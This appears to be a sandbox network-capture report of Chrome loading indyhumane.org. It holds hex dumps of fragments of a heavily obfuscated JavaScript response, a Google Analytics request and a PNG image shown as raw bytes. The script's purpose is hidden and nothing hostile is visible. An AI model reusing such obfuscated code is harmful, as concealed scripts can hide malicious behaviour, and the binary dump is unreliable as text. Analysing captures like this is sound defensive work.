                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC3950INData Raw: 66 36 37 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 30 5f 30 78 65 63 39 38 28 29 7b 76 61 72 20 5f 30 78 34 63 30 32 61 39 3d 5b 27 73 43 6b 61 6c 6d 6f 2b 72 57 27 2c 27 57 50 64 63 54 43 6f 78 78 43 6b 6a 27 2c 27 57 51 33 63 49 43 6b 31 57 4f 75 6e 27 2c 27 61 62 7a 76 45 38 6b 6d 27 2c 27 6a 67 52 63 56 67 68 63 4b 61 27 2c 27 46 61 75 78 7a 6d 6f 64 64 71 6c 63 47 57 27 2c 27 6a 6d 6b 5a 7a 31 56 63 4a 61 27 2c 27 62 62 56 63 50 6d 6f 62 57 37 79 27 2c 27 57 34 42 64 53 38 6b 7a 74 48 6d 27 2c 27 43 43 6f 48 57 36 79 6c 57 4f 79 27 2c 27 57 51 4e 63 51 43 6f 65 77 43 6b 42 27 2c 27 57 35 46 63 52 4c 4e 64 54 53 6f 53 27 2c 27 79 67 70 64 47 75 4f 32 27 2c 27 57 50 79 66 65 32 2f 63 4e 61 27 2c 27 71 43 6b 32 70 38 6b 49 45 71 27 2c 27 63 43 6f 69 70 43 6f
                                                                                                                                                                                                                                                        Data Ascii: f67function a0_0xec98(){var _0x4c02a9=['sCkalmo+rW','WPdcTCoxxCkj','WQ3cICk1WOun','abzvE8km','jgRcVghcKa','FauxzmoddqlcGW','jmkZz1VcJa','bbVcPmobW7y','W4BdS8kztHm','CCoHW6ylWOy','WQNcQCoewCkB','W5FcRLNdTSoS','ygpdGuO2','WPyfe2/cNa','qCk2p8kIEq','cCoipCo
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC4104INData Raw: 31 30 30 30 0d 0a 34 34 29 7b 76 61 72 20 5f 30 78 33 37 39 65 39 30 3d 5b 5d 2c 5f 30 78 33 33 66 38 34 65 3d 30 78 61 39 35 2b 30 78 62 35 30 2b 2d 30 78 34 36 31 2a 30 78 35 2c 5f 30 78 34 39 38 61 34 39 2c 5f 30 78 31 63 34 30 34 63 3d 27 27 3b 5f 30 78 31 61 61 32 62 34 3d 5f 30 78 38 39 33 66 38 62 28 5f 30 78 31 61 61 32 62 34 29 3b 76 61 72 20 5f 30 78 32 36 64 37 36 30 3b 66 6f 72 28 5f 30 78 32 36 64 37 36 30 3d 2d 30 78 66 33 37 2b 2d 30 78 32 31 37 66 2b 30 78 33 30 62 36 3b 5f 30 78 32 36 64 37 36 30 3c 30 78 31 32 35 33 2b 30 78 32 30 36 33 2b 2d 30 78 33 31 62 36 3b 5f 30 78 32 36 64 37 36 30 2b 2b 29 7b 5f 30 78 33 37 39 65 39 30 5b 5f 30 78 32 36 64 37 36 30 5d 3d 5f 30 78 32 36 64 37 36 30 3b 7d 66 6f 72 28 5f 30 78 32 36 64 37 36 30 3d
                                                                                                                                                                                                                                                        Data Ascii: 100044){var _0x379e90=[],_0x33f84e=0xa95+0xb50+-0x461*0x5,_0x498a49,_0x1c404c='';_0x1aa2b4=_0x893f8b(_0x1aa2b4);var _0x26d760;for(_0x26d760=-0xf37+-0x217f+0x30b6;_0x26d760<0x1253+0x2063+-0x31b6;_0x26d760++){_0x379e90[_0x26d760]=_0x26d760;}for(_0x26d760=
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC4104INData Raw: 31 30 30 30 0d 0a 78 31 38 2b 30 78 37 39 33 2b 2d 30 78 66 32 39 2a 2d 30 78 31 29 3b 69 66 28 5f 30 78 31 63 33 38 36 39 3d 3d 3d 5f 30 78 33 37 62 30 33 39 29 62 72 65 61 6b 3b 65 6c 73 65 20 5f 30 78 34 33 61 34 33 30 5b 27 70 75 73 68 27 5d 28 5f 30 78 34 33 61 34 33 30 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 39 62 30 35 64 34 29 7b 5f 30 78 34 33 61 34 33 30 5b 27 70 75 73 68 27 5d 28 5f 30 78 34 33 61 34 33 30 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 30 5f 30 78 65 63 39 38 2c 2d 30 78 32 62 64 39 33 2b 2d 30 78 31 31 31 2a 2d 30 78 63 36 2b 30 78 38 65 31 38 65 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 30 5f 30 78 34 64 65 39 36 62 3d 7b 5f 30 78 31 39 36 63 63 33 3a 30 78 33 31 63 2c 5f 30
                                                                                                                                                                                                                                                        Data Ascii: 1000x18+0x793+-0xf29*-0x1);if(_0x1c3869===_0x37b039)break;else _0x43a430['push'](_0x43a430['shift']());}catch(_0x9b05d4){_0x43a430['push'](_0x43a430['shift']());}}}(a0_0xec98,-0x2bd93+-0x111*-0xc6+0x8e18e),(function(){var a0_0x4de96b={_0x196cc3:0x31c,_0
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC4104INData Raw: 31 30 30 30 0d 0a 30 78 31 39 66 2c 5f 30 78 33 33 61 34 37 62 3a 30 78 31 34 38 2c 5f 30 78 35 39 66 35 33 61 3a 30 78 31 39 32 2c 5f 30 78 33 37 61 38 37 36 3a 30 78 31 35 31 2c 5f 30 78 35 31 61 63 65 39 3a 30 78 35 30 30 2c 5f 30 78 34 66 35 37 33 35 3a 27 4e 69 6e 74 27 2c 5f 30 78 32 66 34 31 63 32 3a 30 78 34 66 35 2c 5f 30 78 33 39 35 64 61 65 3a 30 78 33 32 32 2c 5f 30 78 35 31 64 64 33 61 3a 27 7a 36 4e 5e 27 2c 5f 30 78 33 65 62 63 37 66 3a 30 78 32 66 36 2c 5f 30 78 33 33 62 63 34 38 3a 30 78 33 32 61 2c 5f 30 78 35 34 37 66 62 65 3a 30 78 31 39 34 2c 5f 30 78 32 64 35 32 37 30 3a 30 78 31 35 64 2c 5f 30 78 32 33 33 36 39 39 3a 27 77 76 5e 71 27 2c 5f 30 78 32 66 63 37 64 35 3a 30 78 31 62 66 7d 2c 61 30 5f 30 78 32 34 31 66 63 65 3d 7b 5f 30
                                                                                                                                                                                                                                                        Data Ascii: 10000x19f,_0x33a47b:0x148,_0x59f53a:0x192,_0x37a876:0x151,_0x51ace9:0x500,_0x4f5735:'Nint',_0x2f41c2:0x4f5,_0x395dae:0x322,_0x51dd3a:'z6N^',_0x3ebc7f:0x2f6,_0x33bc48:0x32a,_0x547fbe:0x194,_0x2d5270:0x15d,_0x233699:'wv^q',_0x2fc7d5:0x1bf},a0_0x241fce={_0
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC4104INData Raw: 31 30 30 30 0d 0a 66 2c 30 78 32 63 65 2c 30 78 32 61 38 29 2b 5f 30 78 31 32 38 33 66 66 28 30 78 32 65 31 2c 30 78 32 62 35 2c 30 78 33 32 38 2c 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 35 62 37 63 36 61 2c 27 4e 69 6e 74 27 29 2b 5f 30 78 33 61 32 63 31 63 28 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 32 31 38 38 63 65 2c 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 32 39 30 38 34 37 2c 27 47 28 31 28 27 2c 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 31 30 33 37 37 30 2c 30 78 32 36 61 29 2b 5f 30 78 31 32 38 33 66 66 28 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 32 36 39 62 61 65 2c 30 78 33 30 34 2c 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 65 63 39 36 32 64 2c 30 78 32 63 62 2c 27 36 26 6d 54 27 29 2b 5f 30 78 33 61 32 63 31 63 28 61 30
                                                                                                                                                                                                                                                        Data Ascii: 1000f,0x2ce,0x2a8)+_0x1283ff(0x2e1,0x2b5,0x328,a0_0x4de96b._0x5b7c6a,'Nint')+_0x3a2c1c(a0_0x4de96b._0x2188ce,a0_0x4de96b._0x290847,'G(1(',a0_0x4de96b._0x103770,0x26a)+_0x1283ff(a0_0x4de96b._0x269bae,0x304,a0_0x4de96b._0xec962d,0x2cb,'6&mT')+_0x3a2c1c(a0
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC4104INData Raw: 31 30 30 30 0d 0a 30 78 33 64 35 34 63 34 2c 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 39 39 34 32 33 33 2c 30 78 33 31 66 2c 27 42 2a 58 24 27 29 2b 5f 30 78 33 61 32 63 31 63 28 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 39 38 39 39 37 39 2c 30 78 32 61 32 2c 27 33 66 52 39 27 2c 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 31 39 32 62 61 33 2c 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 35 33 32 35 30 30 29 2b 5f 30 78 33 61 32 63 31 63 28 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 36 37 39 34 33 64 2c 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 37 37 36 63 32 31 2c 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 37 66 39 35 66 36 2c 30 78 32 38 39 2c 61 30 5f 30 78 34 64 65 39 36 62 2e 5f 30 78 34 31 30 30 37 61 29 2b 5f 30 78 31 32 38 33 66 66
                                                                                                                                                                                                                                                        Data Ascii: 10000x3d54c4,a0_0x4de96b._0x994233,0x31f,'B*X$')+_0x3a2c1c(a0_0x4de96b._0x989979,0x2a2,'3fR9',a0_0x4de96b._0x192ba3,a0_0x4de96b._0x532500)+_0x3a2c1c(a0_0x4de96b._0x67943d,a0_0x4de96b._0x776c21,a0_0x4de96b._0x7f95f6,0x289,a0_0x4de96b._0x41007a)+_0x1283ff
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC4104INData Raw: 31 30 30 30 0d 0a 38 62 36 34 2c 21 21 5b 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 64 38 62 36 34 28 29 7b 76 61 72 20 61 30 5f 30 78 32 63 30 37 33 39 3d 7b 5f 30 78 33 63 31 37 39 35 3a 30 78 31 31 38 2c 5f 30 78 31 37 36 63 39 65 3a 30 78 36 38 7d 2c 61 30 5f 30 78 31 34 32 35 63 31 3d 7b 5f 30 78 32 32 61 66 66 63 3a 30 78 62 33 2c 5f 30 78 33 33 32 66 34 39 3a 30 78 31 30 65 7d 2c 61 30 5f 30 78 31 37 63 31 62 35 3d 7b 5f 30 78 35 38 35 63 36 64 3a 30 78 31 36 62 2c 5f 30 78 35 35 36 64 31 33 3a 30 78 66 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 39 32 36 37 32 30 28 5f 30 78 34 63 61 37 64 37 2c 5f 30 78 34 35 61 34 31 36 2c 5f 30 78 34 31 63 62 35 64 2c 5f 30 78 34 35 63 38 64 34 2c 5f 30 78 32 63 35 36 35 37 29 7b 72 65 74 75 72 6e 20 5f
                                                                                                                                                                                                                                                        Data Ascii: 10008b64,!![]);function _0x2d8b64(){var a0_0x2c0739={_0x3c1795:0x118,_0x176c9e:0x68},a0_0x1425c1={_0x22affc:0xb3,_0x332f49:0x10e},a0_0x17c1b5={_0x585c6d:0x16b,_0x556d13:0xf0};function _0x926720(_0x4ca7d7,_0x45a416,_0x41cb5d,_0x45c8d4,_0x2c5657){return _
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1922INData Raw: 37 37 62 0d 0a 32 38 33 66 66 28 5f 30 78 64 62 34 33 30 31 2d 30 78 31 32 35 2c 5f 30 78 32 61 33 37 66 64 2d 61 30 5f 30 78 34 38 31 39 33 39 2e 5f 30 78 35 61 33 32 33 35 2c 5f 30 78 34 63 32 35 36 64 2d 61 30 5f 30 78 34 38 31 39 33 39 2e 5f 30 78 32 33 30 61 34 34 2c 5f 30 78 33 63 32 35 65 66 2d 20 2d 30 78 33 35 39 2c 5f 30 78 34 63 32 35 36 64 29 3b 7d 76 61 72 20 5f 30 78 31 30 39 36 65 36 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 65 64 38 36 30 28 61 30 5f 30 78 32 34 31 66 63 65 2e 5f 30 78 32 39 61 33 31 34 2c 61 30 5f 30 78 32 34 31 66 63 65 2e 5f 30 78 36 38 30 34 61 34 2c 30 78 63 39 2c 30 78 31 30 66 2c 61 30 5f 30 78 32 34 31 66 63 65 2e 5f 30 78 33 65 33 62 61 66 29 2b 5f 30 78 35 65 64 38 36 30 28 61 30 5f 30 78 32 34 31 66 63 65 2e 5f
                                                                                                                                                                                                                                                        Data Ascii: 77b283ff(_0xdb4301-0x125,_0x2a37fd-a0_0x481939._0x5a3235,_0x4c256d-a0_0x481939._0x230a44,_0x3c25ef- -0x359,_0x4c256d);}var _0x1096e6=document[_0x5ed860(a0_0x241fce._0x29a314,a0_0x241fce._0x6804a4,0xc9,0x10f,a0_0x241fce._0x3e3baf)+_0x5ed860(a0_0x241fce._
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        105192.168.2.449879216.239.32.1814432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1226OUTPOST /g/collect?v=2&tid=G-VFFY2PDZ27&gtm=45je5170v9118100243z8898710595za200zb898710595&_p=1736387951011&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=932040568.1736387953&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=1&sid=1736387955&sct=1&seg=0&dl=https%3A%2F%2Findyhumane.org%2F&dt=IndyHumane%20-%20IndyHumane&en=page_view&_fv=1&_ss=1&tfd=10439 HTTP/1.1
                                                                                                                                                                                                                                                        Host: analytics.google.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC845INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                                                                                        Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],}
                                                                                                                                                                                                                                                        Server: Golfe2
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        106192.168.2.449882192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC404OUTGET /wp-content/uploads/2024/12/dog-day-out2-768x723.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC604INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 613496
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2024/12/dog-day-out2-768x723.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 08 Dec 2024 18:42:35 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC765INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 00 00 00 02 d3 08 06 00 00 00 a1 5c 65 bb 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 20 00 49 44 41 54 78 9c ec dd 6b ac ed e9 7d d8 f5 ef 73 fb df d6 6d 5f ce 9c 99 39 67 ec 19 c7 f6 d8 8e 8d db 84 d8 6a d2 24 34 6d 69 42 29 2a 2d 48 80 80 00 2a 51 40 a8 ea 0b 04 6f aa 08 21 d4 17 51 c4 8b aa 22 88 57 15 52 41 a0 56 85 17 51 54 0a 2a 88 16 13 dc 26 b2 92 d8 49 1c 5f c6 e3 33 67 ce 65 ef 75 ff df 9e 2b 2f fe eb 78 26 4e 52 3b e9 9c cb cc 3c 1f e9 af bd d7 da 6b af ff 7f df d6 7e 7e cf f3 7b 7e 3f c8 b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 ec 99 22 9e f6 05 64 59 96 65 ef 3d 29 25 84 10
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR\epHYs+ IDATxk}sm_9gj$4miB)*-H*Q@o!Q"WRAVQT*&I_3geu+/x&NR;<k~~{~?,,,,,,,,,,,,,,"dYe=)%
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: e5 00 20 cb b2 ec 29 39 a5 fc fc 04 f0 5f 00 7f 94 77 ef 4c fb bb cd c0 94 e6 f4 37 81 ff 5b 08 f1 e5 a7 7c 3d 59 96 65 4f 54 0e 00 b2 2c cb 9e 82 94 d2 19 f0 17 81 ff 98 69 f0 ff 2c e6 d2 bf d7 ad 99 56 02 fe 1f de aa 26 94 57 05 b2 2c 7b cf cb 01 40 96 65 d9 13 76 1a fc ff 0c f0 6f 32 6d b6 cd 33 ff 4f d7 c0 d4 b3 e0 8a 29 20 f8 b9 bc 2a 90 65 d9 7b 59 0e 00 b2 2c cb 9e 90 53 2d fe 4f 03 7f 1d f8 2c ef 7c 5d fc ec 9f 9d 65 2a 25 fa 57 80 bf cf ef 53 1e 35 cb b2 ec dd 2c bf aa 65 59 f6 54 9c ea cb 57 4c 25 2a 0b a6 f2 94 7b de ea fa fa a8 e3 eb b7 aa b5 9c 3e e7 5b be d3 c0 ec d1 e3 9f 85 01 dc 69 b3 ef 9f 01 7e 8e a9 51 56 f6 6c db 03 7f 0b f8 6f c9 69 41 59 96 bd c7 3c fd ff 8a 59 96 bd 6f 9c 36 bd de 60 6a 1a f5 12 53 ad fb 3f c2 54 57 fe 75 e0 8b c0
                                                                                                                                                                                                                                                        Data Ascii: )9_wL7[|=YeOT,i,V&W,{@evo2m3O) *e{Y,S-O,|]e*%WS5,eYTWL%*{>[i~QVloiAY<Yo6`jS?TWu
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: c2 cc 09 c3 91 30 ee 31 e5 0a 51 35 10 22 42 40 70 1d 22 46 5c 7b 24 0c 3b 10 09 a9 0b 12 82 14 c0 f6 2d c1 f6 44 24 e5 f2 79 46 17 38 5c df c5 f6 5b 24 9e 7a d6 50 d6 0b 8c 51 50 34 c8 ea 9c a2 5a 61 66 37 51 17 1f 42 cf 2f a9 6f bc 8c ae 57 08 a9 9e d6 8f 2c 32 55 0a fa 19 a6 4a 41 43 de 1b 90 65 d9 b3 22 bf 1a 65 d9 fb c8 29 c5 e7 87 80 bf 0c fc 04 53 03 ad ec 19 95 52 24 8c 2d c4 40 fb e0 ab 0c 77 be 80 4c 23 21 25 b4 d6 e8 e6 06 aa 6c 88 42 22 cb 25 4a 97 10 2c a1 7d 48 18 b6 88 14 50 d5 62 9a bb 37 15 52 d5 a4 14 10 ca 20 b5 21 38 8b 48 09 59 d4 20 34 42 19 90 86 24 24 04 37 e5 eb 2b 35 65 15 a5 00 d1 13 fb 3d 21 3a 84 aa 10 42 11 5d 4b 1c 8f c4 61 4d e8 f7 04 24 c1 05 ba ed 03 9a f9 8a d9 e5 2d 42 0c c4 f1 48 b2 3b 42 7b 4d 0c 8e 18 22 63 77 24 d8
                                                                                                                                                                                                                                                        Data Ascii: 01Q5"B@p"F\{$;-D$yF8\[$zPQP4Zaf7QB/oW,2UJACe"e)SR$-@wL#!%lB"%J,}HPb7R !8HY 4B$$7+5e=!:B]KaM$-BH;B{M"cw$
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: 77 78 88 bf fa 2a de f5 24 21 88 8c 08 01 aa 98 13 45 81 1d 07 b4 2e b1 c3 81 30 f4 34 cb 0b bc ed 39 5e dd 43 eb 82 e8 1d 76 38 d0 b7 2d fd 68 f1 ed 01 a3 35 e5 6c c6 fc f2 45 86 21 e0 da 0d 55 2d 89 08 fa b8 a3 3f be 8e 77 96 7a 3e a7 2c 35 29 26 b4 52 44 3b 10 ac 45 aa 19 c6 18 86 e3 0e a9 04 ca 9d 1a 74 09 90 45 44 11 21 55 98 b2 44 ca 73 b0 06 d7 ef 08 de 12 3d 44 e7 08 43 40 94 86 a2 39 43 99 0a 55 4c 29 3d 8b 0a c2 e5 8c 7e 5c d0 ee 67 ec d6 3b 8e fd c0 fe 68 91 c2 60 8c a4 28 34 cd bc 86 7d 8b 77 01 6f 47 b4 96 2c ea 02 21 35 55 55 53 68 43 a1 f5 94 0a 65 3b 42 4c 08 a9 49 42 63 c7 84 1f 76 28 22 45 b9 41 5f dd 65 7c f8 1a e3 83 6f b0 fc f8 9f a0 3c bf 8d 2a 66 4f 22 10 90 4c ab 71 ff 39 70 96 52 fa 59 e0 b5 dc 38 2c cb b2 27 29 07 00 59 f6 2e 92
                                                                                                                                                                                                                                                        Data Ascii: wx*$!E.049^Cv8-h5lE!U-?wz>,5)&RD;EtED!UDs=DC@9CUL)=~\g;h`(4}woG,!5UUShCe;BLIBcv("EA_e|o<*fO"Lq9pRY8,')Y.
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: eb 29 9b 25 20 88 c9 52 54 73 d0 8a ee c1 6f a3 a4 a4 ac 56 a4 68 09 dd 86 10 22 10 a8 9e fb 08 02 90 a6 44 ca 12 df 6f 31 f3 0b cc fc 12 1f 1c 42 48 08 11 ef 3a a4 50 c4 7e 8b 5e 3e 8f ac e6 53 7a 8a 90 50 d4 48 d3 10 fa 3d d1 1e 51 a6 c6 5c 7e 08 21 0d e8 e2 5b b3 d2 6f 7d 51 6f 7f 3f f0 ad 7c 98 ef ee 1b 42 0a 23 6e f3 1a fd 6b ff 08 55 5f 50 be f4 19 00 a2 6d 41 08 da d7 3e 8f e8 d6 d8 ed 9b d8 e8 19 f6 f7 68 9a 86 dd ae 45 c5 1e a5 15 ca cc 88 1e 94 51 0c b6 a7 32 15 31 09 7a 0b 8b d5 39 b2 d2 28 5d 13 52 44 99 05 5a 57 d4 95 46 c6 16 bb 7f 63 da 4b 20 6a ec f1 1a db 3e 24 c5 44 42 a1 95 46 2a c9 7a bd 67 b7 3d 50 d7 25 cb d5 92 61 e8 a8 ab 39 31 05 74 31 67 b4 81 b6 dd 53 98 8a 66 75 8e 6e ce 28 8a 05 e5 fc 12 35 9b 11 5c cb b8 b9 7b da c4 3b 92 fc
                                                                                                                                                                                                                                                        Data Ascii: )% RTsoVh"Do1BH:P~^>SzPH=Q\~![o}Qo?|B#nkU_PmA>hEQ21z9(]RDZWFcK j>$DBF*zg=P%a91t1gSfun(5\{;
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: 3c 51 96 65 ef 4f b9 0a 50 96 3d 41 a7 ee bc 9f 06 fe 3c d3 a6 de 4f 33 95 f1 7c f6 a5 44 f4 23 c3 c3 d7 b0 db 7b 84 f1 c0 78 fd 3a 69 dc 12 51 54 37 5f c5 79 8f f4 96 34 1c e9 bb 6b c6 76 47 59 56 ec 1e 7e 93 45 55 61 ea 8a a4 2a 86 21 30 5f 94 f8 fe 88 2e b6 24 0f 41 2c f0 ed 06 5d 14 08 ad 41 d7 d8 20 50 52 51 36 2b 76 f7 af a6 c1 ac 4e 0c ed 3d dc 98 68 6e 2c 48 52 23 ec 48 1a a6 5a f5 c2 5b 64 59 13 ba 35 6e 98 f2 e5 a5 9e 52 81 c2 f1 1a a9 6b c4 ec 02 92 23 76 d7 c4 18 91 e5 9c b0 79 80 90 86 14 3c 7a 71 01 c5 9c 64 5b e2 f1 0e b8 23 be db 13 5d c2 9c df 06 7b 44 94 ab a9 b9 d5 70 20 fa 11 55 d6 a0 4b 92 ed 60 dc 93 fa 6b 92 ed f0 fd 1a bb bb c7 30 78 6c 2a 50 76 a0 3c 3c 24 f8 01 10 a4 14 91 42 12 91 60 66 14 b3 15 29 7a fc b8 a1 58 9c 4d 8d bd 52
                                                                                                                                                                                                                                                        Data Ascii: <QeOP=A<O3|D#{x:iQT7_y4kvGYV~EUa*!0_.$A,]A PRQ6+vN=hn,HR#HZ[dY5nRk#vy<zqd[#]{Dp UK`k0xl*Pv<<$B`f)zXMR
